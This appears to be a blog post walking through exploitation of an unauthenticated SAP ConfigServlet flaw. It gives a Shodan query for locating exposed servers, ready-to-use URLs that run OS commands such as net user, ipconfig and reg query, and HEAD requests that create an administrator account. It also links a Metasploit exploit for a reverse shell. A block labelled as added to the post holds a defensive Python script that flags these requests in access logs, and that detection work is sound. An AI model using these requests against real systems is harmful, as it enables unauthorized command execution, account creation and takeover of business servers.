Last week, Dmitry Chastuchin, Principal Researcher at ERPScan, published vulnerabilities in SAP.

SAP is the most popular business application. More than 180000 customers worldwide use it.

Companies like Nike, Coca-Cola and Sony work with SAP systems.

In this post, we are going to talk about how we can exploit these weaknesses.

First of all, we need to locate possibly vulnerable SAP servers. As usual, we are going to use Shodan.

http://www.shodanhq.com/search?q=%2Firj%2Fportal+50000

Then, we are going to execute commands on the SAP server through our web browser, using the following URL queries without any authentication.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist

We can see the running processes on the server.

We can view and edit the Windows Server registry.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=reg query hkcu\console\

We can see the network interfaces.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig /all

We can run a traceroute in order to discover the network where the SAP server is hosted.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tracert www.google.com

We can see all operating system users.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net user

We can show its ARP table.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=arp%20-a

We can even ping servers on the same network.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ping%2010.100.8.221

Another great discovery is that an administrator SAP user can be created with HEAD requests:

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators
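Every request shown above goes to the same ConfigServlet path and carries its action in the `param` query string, which makes this activity easy to spot in web-server logs. As an added example (not part of the original post, nor code from ERPScan or SAP), the following Python script scans access-log lines for requests to that servlet and flags the `EXECUTE_CMD`, `CREATEUSER` and `ADD_USER_TO_GROUP` actions so that a defender of an SAP portal can alert on them. The log lines, IP addresses, timestamps and severity labels are constructed for illustration, and the combined log format of a reverse proxy in front of the portal is an assumption.

```python
"""Flag unauthenticated SAP ConfigServlet requests in web access logs.

Added example, not part of the original post. It scans combined-format
access-log lines, picks out requests to the ConfigServlet path used in the
post, and extracts the requested action and its arguments so that command
execution and user creation attempts can be alerted on. All sample data
below is constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# Both path variants seen in the post: the full servlet path and the short alias.
CONFIGSERVLET_PATH = re.compile(
    r"^/ctc/(?:servlet/)?(?:com\.sap\.ctc\.util\.)?ConfigServlet$", re.IGNORECASE
)

# Assumed combined log format: ip ident user [timestamp] "METHOD target HTTP/x" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Actions named in the post and the severity a defender would assign (constructed labels).
ACTION_SEVERITY = {
    "EXECUTE_CMD": "critical",     # OS command runs as the SAP service account
    "CREATEUSER": "high",          # a new portal user is created
    "ADD_USER_TO_GROUP": "high",   # privilege change, e.g. into Administrators
}

# Constructed sample log lines; hosts, IPs and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Apr/2013:10:01:12 +0000] "GET /irj/portal HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Apr/2013:10:02:40 +0000] "GET /ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all HTTP/1.1" 200 844 "-" "curl/7.29"
203.0.113.7 - - [25/Apr/2013:10:03:01 +0000] "HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla HTTP/1.1" 200 0 "-" "curl/7.29"
203.0.113.7 - - [25/Apr/2013:10:03:02 +0000] "HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators HTTP/1.1" 200 0 "-" "curl/7.29"
10.0.0.9 - - [25/Apr/2013:10:04:00 +0000] "GET /ctc/ConfigServlet HTTP/1.1" 403 0 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Apr/2013:10:04:05 +0000] "GET /ctc/ HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""


def _param_value(query):
    """Return the raw (still percent-encoded) value of the 'param' query field."""
    # Split on '&' ourselves: older urllib.parse.parse_qs also split on ';',
    # which would tear the action string apart.
    for pair in query.split("&"):
        if pair.startswith("param="):
            return pair[len("param="):]
    return ""


def _parse_args(chunks):
    """Turn 'USERNAME=a,PASSWORD=b' style chunks into a dict."""
    args = {}
    for chunk in chunks:
        # CMDLINE carries a whole command line, which may itself contain commas.
        pairs = [chunk] if chunk.startswith("CMDLINE=") else chunk.split(",")
        for kv in pairs:
            if "=" in kv:
                key, value = kv.split("=", 1)
                args[key] = value
    return args


def parse_line(line):
    """Return an alert dict for a ConfigServlet request, or None for other lines."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not CONFIGSERVLET_PATH.match(parts.path):
        return None
    # Split on ';' before decoding so an encoded ';' inside a command stays intact.
    fields = [unquote(f) for f in _param_value(parts.query).split(";")]
    config_class = fields[0]
    action = fields[1] if len(fields) > 1 else ""
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "method": m.group("method"),
        "status": int(m.group("status")),   # even a 403/404 attempt is worth an alert
        "config_class": config_class,
        "action": action,
        "args": _parse_args(fields[2:]),
        "severity": ACTION_SEVERITY.get(action, "medium"),
    }


def scan(log_text):
    """Scan a whole log and return the list of alerts in log order."""
    return [hit for hit in map(parse_line, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['ip']} {alert['method']} "
              f"{alert['action'] or '(no action)'} {alert['args']} -> {alert['status']}")
```

Any hit from the internet-facing side is worth an alert regardless of the HTTP status, since the servlet is not meant to be reachable without authentication at all; the `EXECUTE_CMD` hits additionally give you the exact command line that was run, which is what the incident responder will need.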

On 2013-04-25, Andras Kabai published an exploit. You can run it with Metasploit, upload a payload, get a reverse shell and take control of the SAP server.

You can download the exploit, called "SAP ConfigServlet Remote Unauthenticated Payload Execution", here: http://www.exploit-db.com/exploits/24996/

Finally, you can see the original document here.